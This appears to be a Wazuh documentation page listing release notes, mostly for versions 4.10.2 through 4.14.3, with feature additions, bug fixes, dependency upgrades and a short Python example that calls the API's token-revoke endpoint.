4.7.0

27 November 2023

4.6.0

31 October 2023

4.5.4

23 October 2023

4.5.3

10 October 2023

4.5.2

6 September 2023

4.5.1

24 August 2023

4.5.0

10 August 2023

4.4.5

10 July 2023

4.4.4

13 June 2023

4.4.3

25 May 2023

4.4.2

18 May 2023

4.4.1

12 April 2023

4.4.0

28 March 2023

4.3.11

24 April 2023

4.3.10

16 November 2022

4.3.9

13 October 2022

4.3.8

19 September 2022

4.3.7

24 August 2022

4.3.6

20 July 2022

4.3.5

29 June 2022

4.3.4

8 June 2022

4.3.3

1 June 2022

4.3.2

30 May 2022

4.3.1

18 May 2022

4.3.0

5 May 2022

4.2.7

30 May 2022

4.2.6

28 March 2022

4.2.5

15 November 2021

4.2.4

20 October 2021

4.2.3

6 October 2021

4.2.2

28 September 2021

4.2.1

3 September 2021

4.2.0

25 August 2021

4.1.5

22 April 2021

4.1.4

25 March 2021

4.1.3

23 March 2021

4.1.2

8 March 2021

4.1.1

25 February 2021

4.1.0

15 February 2021

4.0.4

14 January 2021

4.0.3

30 November 2020

4.0.2

24 November 2020

4.0.1

11 November 2020

4.0.0

23 October 2020

4.14.3 Release notes - TBD

This section lists the changes in version 4.14.3. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Resolved issues

This release resolves known issues as the following:

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.14.2 Release notes - TBD

This section lists the changes in version 4.14.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh agent
  • #33313 Added detection of the -a never,task Audit rule in FIM whodata for Linux.

Ruleset
  • #32856 Added SCA policy for Microsoft Windows Server 2025.

Other
  • #33069 Upgraded the starlette dependency to 0.49.1.

Wazuh dashboard
  • #7883 Added persistence for page size and sorting in API tables.

  • #7878 Improved text size consistency and visual hierarchy across the Agent Overview page by implementing standardized typography styling.

  • #7896 Improved Agent Overview resilience by rendering each available system inventory field.

  • #7897 Upgraded cookie dependency to 0.7.0.

  • #7963 Removed the SCA Agent card subtitle.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #33046 Prevented Azure Log Analytics bookmarks from being overwritten across similar configurations.

  • #33330 Fixed discrepancy in the API certificate files.

  • #33589 Made analysisd ruleset reload endpoints fully asynchronous to avoid blocking the API event loop.

  • #33580 Improved analysisd ruleset hot reload performance.

  • #33602 Avoided using systemctl in restart scripts when systemd is not running as PID 1.

Wazuh agent
  • #33171 Fixed Windows agent remote upgrade (WPK) when installed in a custom directory.

  • #33182 Fixed a package issue causing upgrades to fail when the shared directory contained subdirectories.

  • #33270 Fixed FIM issue preventing whodata from working on systems with /var and /etc mounted on different volumes.

  • #33322 Optimized user and group inventory performance in Syscollector on Windows Domain Controllers.

  • #33227 Fixed an agent bug that prevented directories from being received in the remote configuration.

  • #33343 Silenced agent log message about failing to connect to Active Response when it is disabled.

Ruleset
  • #33202 Fixed bug in multiple macOS SCA checks.

  • #33361 Fixed indentation issue in the SCA policy for Windows 10 Enterprise that prevented its execution.

Wazuh dashboard
  • #7883 Removed sorting for Program name and Order columns in the Related decoders table, and the Groups column in the Related rules table, to prevent API errors.

  • #7962 Fixed text alignment and column distribution in the System inventory card within the Agent view.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.14.1 Release notes - 12 November 2025

This section lists the changes in version 4.14.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #32009 Added IAM role support for VPC flow logs in the AWS wodle.

  • #32514 Added support for static and temporary AWS credentials in the Amazon Security Lake subscriber.

  • #32401 Optimized wazuh-db startup by executing agent schema creation in a single transaction.

  • #32463 Improved vulnerabilities index upgrade with hash-based mapping validation, automatic safe reindex, and backup cleanup.

  • #32069 Improved C++ logging mechanism to avoid unnecessary heap allocations.

  • #32521 Improved IndexerConnector error handling and response parsing to provide structured logging of 4xx/5xx errors.

  • #32525 Reduced default verbosity of wazuh-authd when handling invalid connections.

  • #32697 Remoted now reads internal options at process startup.

Wazuh agent
  • #32746 Added support for Homebrew 2.0+ in IT Hygiene for macOS.

  • #31080 Changed how the fim_check_ignore function works in negative regex cases.

  • #31375 Changed how null values for hotfixes are handled in the Windows agent.

  • #32874 Improved service shutdown procedure.

Ruleset
  • #31449 Reworked SCA policy for Microsoft Windows 10 Enterprise.

Other
  • #31422 Upgraded the starlette dependency to version 0.47.2.

  • #32782 Upgraded the embedded Python interpreter to version 3.10.19.

  • #32900 Updated curl dependency to version 8.12.1.

  • #32294 Updated LUA to version 5.4.6.

  • #32294 Updated libarchive to version 3.8.0.

Wazuh dashboard
  • #7804 Upgraded the axios dependency to version 1.12.2.

  • #7841 Improved column order in IT Hygiene > Network > Traffic view to follow a logical source-to-destination flow.

  • #7639 Improved integrity monitoring settings terminology by clarifying file and registry labels, and updating component names for better user understanding.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #32045 Fixed manager vulnerability scan not triggering due to incorrect Syscollector event provider topic name.

  • #32787 Fixed IndexerConnector abuse control to prevent data loss on failed syncs.

  • #32107 Fixed user tag handling by adding user as an alias for the dstuser static field.

  • #32057 Fixed JSON validation issues in Analysisd and SCA components.

  • #32829 Fixed a bug in Vulnerability Scanner where the database offset was updated even in error cases.

Wazuh agent
  • #32383 Fixed indefinite waiting in FIM whodata health check.

  • #31241 Fixed graceful shutdown in FIM.

  • #32049 Verified the SHA256 of commands on every execution.

  • #32528 Fixed duplicate <ca_store> configuration block during RPM package upgrades.

  • #31144 Fixed a bug that prevented overwriting <registry_limit> or <file_limit> options from remote configuration.

  • #29853 Fixed a bug in Logcollector that prevented following symlinks when resolving wildcarded files.

  • #31222 Unified detection logs for wildcarded files in Logcollector.

  • #32027 Fixed a bug in FIM that did not recognize Registry keys unless they were UTF-8.

  • #32731 Fixed a bug in Logcollector that ignored all files with <age> filter on Windows.

  • #32812 Reverted IT Hygiene package vendor format on Debian to include name and email again.

  • #32785 Fixed a bug in IT Hygiene that reported duplicated Edge browser extensions.

  • #32838 Fixed reload of the <labels> block via remote configuration.

  • #32836 Fixed Windows installer to deploy SCA policies for Windows 2022 instead of Windows Server 2025.

Ruleset
  • #31349 Fixed bug in Windows SCA.

  • #31102 Fixed mistaken alert.

  • #31886 Fixed SCA checks in Oracle Linux 9.

  • #32509 Fixed bugs in Windows Server 2016 SCA.

  • #32523 Fixed bugs in PAM decoder.

  • #32480 Fixed macOS Sequoia SCA scans that produced errors.

  • #32802 Fixed Windows Server 2016 SCA policy configuration issue.

Wazuh dashboard
  • #7689 Fixed navigation issue in the MITRE ATT&CK framework details flyout.

  • #7710 Fixed event count evolution visualization in the Endpoint Details view to use the server API context filter.

  • #7783 Fixed sorting by agent count in Top 5 Groups visualization in Endpoints summary.

  • #7803 Fixed System Inventory displaying incorrect agent data after switching agents in the Endpoint Details view.

  • #7838 Replaced the Microsoft Graph API module icon with the official Microsoft Graph API logo for better specificity.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.14.0 Release notes - 23 October 2025

This section lists the changes in version 4.14.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

The 4.14.0 release enhances the IT Hygiene capability with an expanded inventory that now includes browser extensions, endpoint services, users, and groups. It also introduces a new Microsoft Graph API dashboard for monitoring activity and audit events from Microsoft cloud services, and adds support for hot reload of Wazuh agent configuration. In addition, this release introduces multiple stability, performance, and security improvements across the platform.

  • Inventory – Browser Extensions: Added a unified inventory model to track browser extensions across Windows, macOS, and Linux systems. Enables security auditing and compliance monitoring for Chrome, Firefox, Safari, and other browsers.

  • Inventory – Services: Introduced a normalized inventory of Windows services and Linux systemd units. Provides visibility into service states, startup types, and critical services across endpoints.

  • Inventory – Users & Groups: Implemented a cross-platform inventory for system users and groups. Supports normalized data structures, relationships, and consistent queries across agents, Wazuh-DB, and the Dashboard.

  • Wazuh agent configuration hot reload: The Wazuh Agent can now apply remote configuration changes dynamically without breaking its connection to the server. All daemons except agentd are restarted during reload, improving resilience and reducing disruptions across large deployments.

  • Microsoft Graph API dashboard: A new dashboard has been added to visualize and query Microsoft Graph services, including Microsoft Azure cloud events.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #30848 Added system users and groups to the inventory data.

  • #31614 Added browser extensions and services to the inventory data.

  • #31731 Added IPv6 support to the Maltiverse integration.

  • #30192 Improved databaseFeedManagerTesttool.

  • #30793 Adapted wazuh-maild to the RFC5322 standard.

  • #31218 Improved the Active Response endpoint performance.

Wazuh agent
  • #30235 Added support for Parquet version 2 in the AWS wodle.

  • #30797 Added hot configuration reload support for Linux agents.

  • #31163 Added support for Amazon Inspector v2.

  • #30369 Added system users and groups to the inventory data.

  • #805 Added browser extensions to the inventory data.

  • #807 Added services to the inventory data.

  • #31418 Added missing AWS regions us-gov-west-1 and us-gov-east-1 to the AWS wodle.

  • #32413 Added Windows kernel version information to IT Hygiene.

  • #31640 Changed rootkit error messages to warnings due to future deprecation.

RESTful API
  • #30913 Added Syscollector users and groups endpoints.

  • #31513 Added Syscollector services and browser_extensions endpoints.

Ruleset
  • #30745 Added SCA content for Rocky Linux 10.

  • #31747 Added SCA content for Debian 13.

Other
  • #31272 Updated packaging dependency to 25.0.

  • #30536 Updated requests to version 2.32.4.

  • #30624 Updated urllib3 to version 2.5.0 and protobuf to version 5.29.5.

  • #30916 Upgraded Python embedded interpreter to 3.10.18.

  • #31779 Updated OpenSSL to 3.0.15 and cpp-httplib to v0.25.0.

  • #29586 Updated SQLite dependency to version 3.50.4.

Wazuh dashboard
  • #7777 Added visualizations field validations when creating wazuh-states index patterns.

  • #7554 Created Users & Groups inventories. #7587 #7792 #7787

  • #7586 Added the ability to set the Wazuh data path (wazuh directory) within the directory defined through the path.data setting.

  • #7641 Added a new Browser Extensions tab in IT Hygiene. #7696 #7729 #7774 #7785

  • #7516 Added Microsoft Graph API module. #7644 #7661

  • #7646 Added a new Services tab in IT Hygiene. #7695 #7729 #7773 #7790

  • #7711 Added a final step in the Deploy new agent section to navigate back to the agent list.

  • #7712 Updated OS logos.

  • #7742 Changed the Services tab label to Listeners in IT Hygiene > Networks.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #29663 Fixed internal decoder RC startup.

  • #29673 Fixed queue stats RC over wazuh-analysisd.

  • #29672 Fixed race condition in the event queue.

  • #29699 Fixed regexCompile race condition.

  • #30653 Fixed malformed alerts in alerts.log when the <group> tag contains newline characters.

  • #31599 Fixed and improved dpkg version comparison algorithm in Vulnerability Detector.

Wazuh agent
  • #30831 Fixed errors in Azure Graph event fields.

  • #30877 Added the missing provider field to the whodata section in the syscheckd JSON configuration.

  • #31700 Fixed journald disabled filters when both configuration blocks have no filters.

  • #30215 Fixed whodata FIM compatibility with the latest audit versions.

  • #31875 Fixed mismatch between MTU values in the database and indexer for Windows agents.

RESTful API
  • #31046 Fixed secure headers configuration.

  • #31315 Fixed display of sensitive information for non-privileged users.

Ruleset
  • #29976 Fixed multiple Rocky Linux SCA checks generating incorrect results.

  • #30173 Fixed missing check (2.3.7.6) in Windows Server 2019 v2.0.0.

  • #30276 Fixed camel casing in ownCloud ruleset header.

  • #30489 Fixed false positive in check 2.3.3.2 for macOS 13, 14, and 15 SCA.

  • #30529 Fixed bug in rule 92657.

  • #30528 Fixed field names in Office 365 rules.

  • #30515 Fixed action field in Fortigate rules.

  • #30612 Fixed Auditd EXECVE sibling decoders.

  • #31227 Fixed issues with Windows OS languages other than English.

  • #30717 Reworked SCA policy for Debian Linux 12.

  • #32025 Fixed missing comma in 0393-fortiauth_rules.xml.

  • #32102 Fixed Windows SCA user account checks.

  • #32106 Fixed inaccuracies in Ubuntu 24.04 SCA policy.

  • #32143 Fixed incorrect service name in Ubuntu firewall service check.

Wazuh dashboard
  • #7811 Fixed missing scan settings in Inventory Data.

  • #7796 Fixed the Endpoint summary to correctly display outdated agents without filters, resolving previous inconsistencies.

  • #7596 Fixed missing provider and queue_size fields in whodata configuration.

  • #7630 Fixed an error that caused PDF report tables to overflow the page width.

  • #7611 Fixed TypeError when changing API host ID in wazuh.yml configuration.

  • #7669 Fixed behavior and appearance alignment with OpenSearch (Wazuh Indexer) Dev Tools.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.13.1 Release notes - 24 September 2025

This section lists the changes in version 4.13.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh dashboard
  • #7752 Changed the label from Packages to Unique packages in the KPI for IT Hygiene > Software.

Resolved issues

This release resolves known issues as the following:

Wazuh dashboard
  • #7753 Fixed RBAC validation for reload button to prevent API failures when users lack cluster:restart permission.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.13.0 Release notes - 18 September 2025

This section lists the changes in version 4.13.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

The 4.13.0 release improves deployment flexibility, enhances centralized data access, and strengthens platform resilience. Key highlights include the introduction of the IT Hygiene dashboard, which provides users with the ability to centrally view and query IT Hygiene data.

  • Global queries for IT Hygiene data: Wazuh now supports global queries for IT Hygiene data through a new dedicated IT Hygiene dashboard.

  • Reliability and performance improvements across the platform.

  • Multiple bug fixes in core components and the UI.

  • Updates based on recent security scans.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #29232 Improved reports functionality to avoid duplicated daily FIM reports.

  • #29363 Optimized agent query endpoints.

  • #29406 Implemented RBAC resource cache with TTL support.

  • #29514 Improved Wazuh-DB protocol to support large HTTP requests and remove pagination.

  • #29515 Added HTTP client implementation to wazuh-db.

  • #29458 Added hot ruleset reload support to Analysisd.

  • #29916 Enabled CVE re-indexing when documents change in Vulnerability Detector.

  • #29153 Separated control messages from remoted's connection handling.

  • #30504 Added sanity checks for hotfix values in Vulnerability Detector.

  • #30851 Improved exception handling in the run_local SDK function.

  • #29135 Improved Authd connection management using epoll to handle concurrent agent registration requests more efficiently.

  • #31114 Added a single writer buffer manager instance for each indexer connector instance.

Wazuh agent
  • #29391 Added support for Rocky Linux and AlmaLinux in the upgrade module.

  • #29393 Added handling of CentOS 9 SCA files in package specs.

  • #29139 Added SCA support for Oracle Linux 10.

  • #30556 Added Rootcheck rule to detect root-owned files with world-writable permissions.

  • #29426 Improved agent synchronization to reduce redundant payload transfers.

  • #28688 Improved Syscollector to report only Python packages managed by dpkg.

  • #29399 Improved wazuh-db JSON handling performance.

  • #29930 Enhanced Azure module logging.

  • #29940 Improved restart behavior on macOS agents after upgrade.

  • #29443 Standardized service timeouts across components.

  • #30377 Added MS Graph token validation before performing requests.

  • #30763 Added support for UTF-8 characters in file paths in FIM.

  • #30637 Removed internal_key from query filters.

RESTful API
  • #29524 Added server UUID to the /manager/info endpoint.

  • #29589 Added /agents/summary endpoint.

  • #31459 Added ruleset reload endpoints.

Ruleset
  • #29269 Added SCA content for CentOS Stream 9.

  • #29653 Added IOCs and new rules to improve the 4.x ruleset.

  • #29139 Added SCA content for Oracle Linux 10.

  • #28790 Added rule to minimize Windows event flooding on the manager.

Other
  • #29610 Updated Python dependencies: setuptools, Jinja2, and PyJWT.

  • #28646 Upgraded embedded Python interpreter to 3.10.16.

  • #29735 Upgraded h11 to 0.16.0 and httpcore to 1.0.9.

  • #28564 Removed unused Azure Python dependencies.

Wazuh dashboard
  • #7368 Added IT Hygiene application. #7461 #7476 #7475 #7513 #7582 #7588 #7692 #7717

  • #7368 Added hardware and system information to the agent overview.

  • #7379 Added persistence for selected columns and page size in data grid settings. #7513

  • #7373 Added the ability to manage the sample data from IT Hygiene and vulnerabilities. #7449 #7475 #7718

  • #7443 Added back button to Deploy Agent page that redirects to Endpoints Summary.

  • #7412 Added UUID field to the APIs table.

  • #7373 Moved /elastic/samplealerts API endpoints to /indexer/samplealerts.

  • #7430 Changed macOS agent startup command.

  • #7368 Removed Inventory data view from agent overview.

  • #7475 Removed vulnerability.pattern setting.

  • #7368 Removed GET /api/syscollector API endpoint.

  • #7368 Removed inventory data report and POST /reports/agents/{agentID}/inventory API endpoint.

  • #7483 Removed the enrollment.password field from the /utils/configuration endpoint response to prevent unauthorized agent registration by users with read-only API roles.

  • #7657 Changed the manager reset button to reload in Rules, Decoders, and CDB list. #7677

  • #7484 Reduced the number of API calls to retrieve agent summary information.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #29181 Fixed missing agent version handling in Vulnerability Detector.

  • #29624 Fixed race condition in agent status synchronization between worker and master.

  • #30534 Fixed agent-group assignment for missing agents with improved error handling.

  • #30818 Fixed missing OS info updates in global inventory after first scan.

  • #31048 Fixed wazuh-db failure during agent restarts by switching the restart query to HTTP.

  • #30627 Fixed DFM graceful shutdown.

  • #30718 Fixed inode field as string in FIM JSON messages to ensure schema consistency.

  • #30837 Fixed duplicate OS vulnerabilities detected after an OS version change.

Wazuh agent
  • #29312 Fixed incorrect event handling in the Custom logs bucket.

  • #29317 Fixed Azure blob download race condition.

  • #28962 Fixed false FIM reports and configuration upload issues.

  • #29502 Fixed incorrect IPv6 format reported by WindowsHelper.

  • #29561 Fixed hidden port detection and netstat fallback.

  • #29905 Replaced select() with sleep() in Logcollector to avoid Docker-related errors.

  • #30060 Fixed NetNTLMv2 exposure by filtering UNC paths and mapped drives in Windows agent.

  • #29820 Fixed Windows agent not starting after manual upgrade by deferring service start to post-install.

  • #30552 Fixed precision loss in the FIM inode field for values greater than 2^53.

  • #30614 Fixed expanded file list in the logcollector getconfig output.

  • #31187 Fixed authd.pass ACL permissions to match client.keys security level in the Windows agent installer.

RESTful API
  • #29166 Fixed version sorting in agent list endpoint.

  • #28962 Fixed false positive detection during configuration uploading.

Ruleset
  • #29221 Fixed bugs in Windows 11 Enterprise SCA policy.

  • #29040 Fixed multiple SCA check errors in RHEL 9/10 and Rocky Linux 8/9.

  • #28982 Fixed diff logic in rootcheck that caused false negatives.

  • #28711 Fixed incorrect SCA results for RHEL 8 and CentOS 7.

  • #30827 Fixed false positives in Ubuntu 24.04 benchmark.

Wazuh dashboard
  • #7368 Fixed a problem in Vulnerabilities > Dashboard and Inventory when there are no indices matching with the index pattern.

  • #7425 Fixed double backslash warning on xml editor.

  • #7422 Fixed the X-axis label in the Vulnerabilities by year of publication visualization.

  • #7501 Fixed a bug in Rule details flyout, where it didn't map all the compliances.

  • #7540 Fixed the Windows service name in Deploy new agent.

  • #7552 Fixed an issue where filter values could change on navigation or pin/unpin actions, causing unexpected search results.

  • #7544 Fixed an issue in the expanded table row where outdated information could appear when using the refresh button.

  • #7550 Fixed a bug causing format issues in CSV reports.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.12.0 Release notes - 7 May 2025

This section lists the changes in version 4.12.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

Wazuh 4.12.0 introduces functional improvements that expand the platform’s capabilities and compatibility. This release supports ARM architecture in central components, allowing Wazuh to run on a wider range of hardware. It also enhances threat intelligence by adding CTI references to the CVE data, providing better context for vulnerabilities. Additionally, it introduces eBPF support for the File Integrity Monitoring (FIM) module, enabling more efficient and modern monitoring on Linux endpoints.

Breaking changes
  • OpenSearch 2.19.1 and Apache Lucene upgrade: Wazuh 4.12.0 upgrades to OpenSearch 2.19.1 and updates the Apache Lucene version. This change affects compatibility with previous versions. As a result, downgrades are not supported. Once you upgrade the Wazuh indexer to version 4.12.0, you cannot revert to an earlier version.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #26652 Added new compilation flags for the Vulnerability Detection module.

  • #26083 Added support for central components in ARM architectures.

  • #28220 Added functionality to navigate to CTI links related to specific CVE detections from states and alerts.

  • #27614 Updated curl dependency to 8.11.0.

  • #28298 Upgraded cryptography package to version 44.0.1.

  • #28047 Converted server logs timestamp to UTC.

  • #28149 Removed restriction for aws_profile in Security Lake.

  • #28038 Removed error logs when the response is 409 for certain OpenSearch calls.

  • #27451 Upgraded packages: python-multipart to 0.0.20, starlette to 0.42.0, and Werkzeug to 3.1.3.

  • #27990 Removed warning about events in cloudwatchlogs.

  • #27603 Added package condition field in indexed vulnerabilities.

Wazuh agent
  • #27956 Added eBPF-based integration to support whodata in FIM.

  • #28416 Added support for the riskDetections relationship in MS Graph.

  • #28389 Added time delay option in MS Graph integration to prevent log loss.

  • #28276 Added page size option to MS Graph integration.

  • #28388 Implemented Journald rotation detection in Logcollector.

Ruleset
  • #26732 Added SCA content for Windows Server 2025.

  • #26736 Added SCA content for Fedora 41.

  • #26837 Created SCA policy for Distribution Independent Linux.

  • #23194 Created SCA policy for Ubuntu 24.04 LTS.

  • #26982 Improved SCA rule for macOS 15.

Wazuh dashboard
  • #7182 Added setting to limit the number of rows in CSV reports.

  • #7306 Added vulnerability.scanner.reference field containing the CTI reference of the vulnerability.

  • #7192 Refined queue usage visualizations in Statistics.

  • #7390 Removed revision number from About page.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #26720 Fixed inconsistent vulnerability severity categorization by correcting CVSS version prioritization.

  • #26769 Fixed a potential crash in Wazuh-DB by improving the PID parsing method.

  • #28185 Fixed concurrent mechanism on column family RocksDB.

  • #28503 Fixed unused variables in Analysisd.

  • #29050 Fixed Analysisd startup failure caused by mixing static and dynamic rules with the same ID.

  • #27834 Fixed crash in Vulnerability Scanner when processing delayed events during agent re-scan.

  • #26679 Improved signal handling during process stop.

  • #27750 Improved cleanup logic for the content folder in the VD module.

  • #27806 Sanitized invalid size values from package data provider events.

  • #26704 Fixed crash when reading email alerts missing the email_to attribute.

  • #29179 Fixed offset errors by updating the DB only after processing events.

Wazuh agent
  • #26647 Fixed a bug that could cause wazuh-modulesd to crash at startup.

  • #26289 Fixed incorrect UTF-8 character validation in FIM. Thanks to @zbalkan.

  • #27100 Improved URL validation in Maltiverse integration.

  • #28005 Fixed issue in Syscollector where package sizes were reported as negative.

  • #29161 Fixed enrollment failure on Solaris 10 caused by unsupported socket timeout.

  • #29214 Fixed memory issue in the wazuh-agentd argument parser.

  • #28928 Fixed WPK package upgrades for DEB when upgrading from version 4.3.11 or earlier.

Wazuh dashboard
  • #7185 Fixed issue where adding the same filter twice wouldn't display it in the search bar.

  • #7171 Fixed rendering of rows in CDB list table when they start with quotes.

  • #7206 Fixed width of long fields in the document detail flyout.

  • #7267 Fixed logging of UI logs due to an undefined logger property.

  • #7278 Fixed TOP-5-SO filter management in Endpoints > Summary.

  • #7304 Fixed CSV export not filtering by time range.

  • #7336 Fixed agent view not displaying the latest agent state.

  • #7377 Fixed saved queries not appearing in the search bar.

  • #7401 Fixed monitoring cronjob infinite retries in case of a request exception.

  • #7399 Fixed double scroll bar in Discover.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.11.2 Release notes - 1 April 2025

This section lists the changes in version 4.11.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #28797 Improved Wazuh DB performance using built-in types.

RESTful API
  • #28653 Added the authentication_pool_size option to customize the number of authentication processes in the Wazuh server API configuration.

Resolved issues

This release resolves known issues as the following:

Wazuh dashboard
  • #7370 #7371 Fixed several broken Wazuh documentation links.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.11.1 Release notes - 12 March 2025

This section lists the changes in version 4.11.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh agent
  • #28075 Changed ms-graph page size to 50.

  • #28045 Removed ca.com domain filter from the Rootcheck malware ruleset.

Wazuh dashboard
  • #7318 Added missing fields to the default fields list of the alerts index pattern.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #28294 Fixed the OS CPE build for package scans with data from Wazuh-DB.

  • #28292 Added delete by query logic when indexer is disabled.

  • #28396 Fixed heap buffer overflow in Analysisd rule parser.

  • #28429 Fixed unnecessary data copy during curl calls.

Wazuh agent
  • #28339 Improved agent connectivity.

  • #28516 Applied the agent.recv_timeout timeout to the agent enrollment process to prevent it from waiting indefinitely for a response.

Wazuh dashboard
  • #7299 Fixed documentation links related to agent management.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.11.0 Release notes - 20 February 2025

This section lists the changes in version 4.11.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

The 4.11 release introduces significant improvements in vulnerability detection, system inventory accuracy, and virtual machine base OS updates. The focus is on enhancing security insights, ensuring up-to-date system compatibility, and improving detection mechanisms for installed software. Key updates include the enhancement of the vulnerability detection process for CNA (CVE Numbering Authority), updates to AMI and OVA base operating systems, and improvements to Syscollector's software detection capabilities.

Key features include the following:

  • Vulnerability detection CNA enhancement: The vulnerability scanner now prioritizes CISA-sourced vulnerability data over the NVD, ensuring more accurate and detailed vulnerability assessments. This enhancement reduces false positives and improves alignment with official security sources.

  • AMI and OVA base OS update: The base OS for AMI and OVA has been updated to Amazon Linux 2023 (AL2023) due to security vulnerabilities in Amazon Linux 2 (AL2) and its approaching end of life.

  • Syscollector's software detection improvement: Syscollector now provides enhanced detection of installed software. Improvements include better package identification in macOS, expanded detection of pip and npm installations, and integration with Windows WMI to capture system updates more accurately.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #27771 Improved delimiters on XML.

  • #27893 Improved FIM decoder.

  • #27835 Improved SCA and Syscheck decoders.

  • #27914 Improved CISCAT decoder detection messages.

  • #27692 Added CISA vulnerability content and prioritized it over NVD in the vulnerability scanner.

  • #28195 Changed ms-graph page size.

Wazuh agent
  • #26706 Improved Syscollector hotfix coverage on Windows by integrating WMI and WUA APIs.

  • #26782 Extended Syscollector capabilities to detect installed .pkg packages.

  • #26236 Updated standard Python and NPM package location in Syscollector to align with common installation paths.

Wazuh dashboard
  • #7193 Refined the layout of the agent details view.

  • #7195 Changed the width of the command column, relocated the argvs column, and changed the width of the remaining columns in the processes table.

  • #7245 Removed unused node_build field in the package manifest of the wazuh plugin.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #26132 Enabled inventory synchronization in Vulnerability Detector when the Indexer module is disabled.

Wazuh agent
  • #27739 Fixed error in event processing on AWS Custom Logs Buckets module.

RESTful API
  • #26255 Added the security:revoke action to the PUT /security/user/revoke endpoint (see the sketch below).

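The following is a minimal sketch of how the endpoint affected by #26255 is typically exercised. The host, port, and credentials are placeholders, and the authentication step (POST /security/user/authenticate returning a JWT) reflects standard Wazuh server API usage rather than anything introduced by this fix; after #26255, the calling user needs the security:revoke RBAC action for the request to succeed.

  import requests
  import urllib3

  WAZUH_API = "https://localhost:55000"   # placeholder host and port
  USER, PASSWORD = "wazuh", "wazuh"       # placeholder credentials

  # Self-signed certificates are common on test installs; verification is
  # disabled here only to keep the example short.
  urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

  # Obtain a JWT from the server API (standard Wazuh API authentication flow).
  auth = requests.post(
      f"{WAZUH_API}/security/user/authenticate",
      auth=(USER, PASSWORD),
      verify=False,
  )
  auth.raise_for_status()
  token = auth.json()["data"]["token"]

  # Revoke all active tokens. Per #26255, this call requires the
  # security:revoke permission for the authenticated user.
  response = requests.put(
      f"{WAZUH_API}/security/user/revoke",
      headers={"Authorization": f"Bearer {token}"},
      verify=False,
  )
  print(response.status_code, response.json())
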
Wazuh dashboard
  • #7251 Fixed documentation URL related to the usage of the authentication password in agent deployment.

  • #7255 Fixed a problem with duplicated requests to get the list of valid index patterns in the menu.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.10.3 Release notes - 19 August 2025

This section lists the changes in version 4.10.3. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Other
  • #30829 Updated requests to version 2.32.4 (backport from 4.14.0).

  • #30829 Updated urllib3 to version 2.5.0 and protobuf to version 5.29.5 (backport from 4.14.0).

  • #29933 Updated dependencies: setuptools, Jinja2, and PyJWT (backport from 4.14.0).

Resolved issues

This release resolves known issues as the following:

Wazuh dashboard
  • #7648 Fixed a bug that caused a format issue in CSV reports.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.10.2 Release notes - 22 May 2025

This section lists the changes in version 4.10.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #29633 Improved SCA and Syscheck decoders. (Backport from 4.11.0)

Other
  • #29669 Upgraded python-multipart to 0.0.20, starlette to 0.42.0, Werkzeug to 3.1.3 (backport from 4.12.0), h11 to 0.16.0, and httpcore to 1.0.9.

Wazuh dashboard
  • #7433 Added a test to verify that table column fields are known, and updated the known fields of the alerts index with new ones.

Resolved issues

This release resolves known issues as the following:

Wazuh manager
  • #29612 Enabled inventory synchronization in Vulnerability Detector when the Indexer module is disabled. (Backport from 4.11.0)

  • #29613 Fixed OS CPE build for package scans with data from Wazuh-DB. (Backport from 4.11.1)

  • #29599 Fixed heap buffer overflow in Analysisd rule parser. (Backport from 4.11.1)

  • #29615 Improved signal handling during process stop. (Backport from 4.12.0)

  • #29616 Fixed crash when reading email alerts missing the email_to attribute. (Backport from 4.12.0)

Wazuh agent
  • #29598 Fixed a bug that could cause wazuh-modulesd to crash at startup. (Backport from 4.12.0)

  • #29600 Fixed WPK package upgrades for DEB when upgrading from version 4.3.11 or earlier. (Backport from 4.12.0)

  • #29635 Fixed error in event processing on the AWS Custom Logs Buckets module. (Backport from 4.11.0)

  • #29604 Improved URL validation in the Maltiverse integration. (Backport from 4.12.0)

Changelogs

